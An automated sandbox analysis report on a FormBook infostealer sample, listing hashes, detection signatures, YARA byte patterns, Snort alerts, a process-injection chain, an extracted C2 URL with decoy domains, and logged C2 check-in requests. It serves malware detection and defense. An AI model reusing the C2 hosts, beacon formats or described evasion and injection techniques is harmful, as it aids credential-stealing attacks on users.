Loading ...

Play interactive tourEdit tour

Analysis Report TazxfJHRhq.exe

Overview

General Information

Sample Name:TazxfJHRhq.exe
Analysis ID:383852
MD5:f818665dd48a93c48255d3ceadf92a6e
SHA1:2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
SHA256:6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TazxfJHRhq.exe (PID: 4736 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
    • TazxfJHRhq.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 4064 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5948 cmdline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        1.2.TazxfJHRhq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.TazxfJHRhq.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Source: http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Source: http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TazxfJHRhq.exeVirustotal: Detection: 14%Perma Link
          Source: TazxfJHRhq.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.cmstp.exe.4af7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.cmstp.exe.6bd538.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: TazxfJHRhq.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TazxfJHRhq.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.autotrafficbot.com/evpn/
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1Host: www.productsoffholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1Host: www.markmalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1Host: www.zhuledao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1Host: www.jcernadas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1Host: www.theholisticbirthco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1Host: www.tor-one.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1Host: www.de-knutselkeet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1Host: www.autotrafficbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1Host: www.curiosityisthecurebook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1Host: www.usinggroovefunnels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1Host: www.cgpizza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1Host: www.physicalrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-CGN1DE GD-EMEA-DC-CGN1DE
          Source: Joe Sandbox ViewASN Name: ANONYMIZEEpikNetworkCH ANONYMIZEEpikNetworkCH
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1Host: www.productsoffholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1Host: www.markmalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1Host: www.zhuledao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1Host: www.jcernadas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1Host: www.theholisticbirthco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1Host: www.tor-one.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1Host: www.de-knutselkeet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1Host: www.autotrafficbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1Host: www.curiosityisthecurebook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1Host: www.usinggroovefunnels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1Host: www.cgpizza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1Host: www.physicalrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.jamessicilia.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 09:10:22 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
